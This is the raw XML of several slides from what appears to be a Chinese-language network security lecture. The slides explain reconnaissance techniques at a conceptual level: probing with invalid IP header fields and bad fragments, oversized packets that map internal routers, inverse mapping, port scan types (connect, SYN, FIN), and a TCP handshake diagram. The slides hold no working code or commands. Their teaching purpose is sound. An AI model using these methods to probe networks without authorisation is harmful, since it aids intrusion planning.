              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送填充错误字段值的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机或过滤设备会反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Destination Unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法同样可以探测目标主机和网络设备以及其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>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C06B70D2-A6F7-4FCF-8F6E-E982F5ADB488}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317442" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头中设置无效的字段值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接收错误数据分片，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>某些分片</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>丢失，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>规定时间内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>得不到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>更正</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>丢弃数据包，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>并反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Fragment Reassembly Time Exceeded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>错误报文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检测到目标主机和网络过滤设备及其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>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DDC8BB0E-6C4E-4333-B75D-D7AD83FEC668}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319490" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>错误数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分片</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据包长度超过目标系统所在路由器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>且设置禁止分片标志</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由器反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Fragmentation Needed and Don’t Fragment Bit was Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>差错报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>获取目标系统的网络拓扑结构。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321538" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过超长包探测内部路由器</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C849EC80-D566-4FEB-954B-E4D6ACF173F7}"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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>探测被过滤设备或防火墙保护的网络（内部结构）和主机。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通常这些系统无法从外部直接到达。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>构造可能的内部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址列表，并向这些地址发送数据包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：报错</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对方路由器反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP Host Unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP Time Exceeded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：不理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>没有接收到相应错误报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反向映射探测</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7B5189E8-F324-4ECE-9E62-8F3F3E8DA421}"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端口扫描</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
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端口是通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通道，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也是潜在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发现目标主机的开放端口。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>思想：向指定端口发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，观察有无应答及应答类型，判断端口是否开放及服务情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="内容占位符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536" y="2515832"/>
            <a:ext cx="8076059" cy="4342168"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主要包括以下三类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>开放扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>半开放扫描（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐蔽扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描、分段扫描）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接的握手与挥手</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口扫描技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C7A34942-AE82-4338-9DE7-02A83A922E90}"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>TCP连接的建立（三次握手）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771"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2772"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32773" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="1989138"/>
            <a:ext cx="4535487" cy="431800"/>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2774" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2189163" y="2708275"/>
            <a:ext cx="4535487" cy="504825"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32775" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="3429000"/>
            <a:ext cx="4535487" cy="504825"/>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2776" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="4652963"/>
            <a:ext cx="4535487" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32777" name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="429260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itchFamily="49" charset="-122"/>
                <a:sym typeface="黑体"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2778" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3844925" y="1844675"/>
            <a:ext cx="26789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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SEQ=ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=x(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1000)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="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(SYN=1)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2779"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27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27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Box 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="2492375"/>
            <a:ext cx="45432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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SEQ=ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=y(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D00C8"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2000)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=1001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(SYN=1,  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2784" name="TextBox 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627313" y="3140075"/>
            <a:ext cx="298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SEQ=1000  ACK=2001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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5168967"/>
            <a:ext cx="8229600" cy="1569660"/>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a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SYN(Synchronous)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
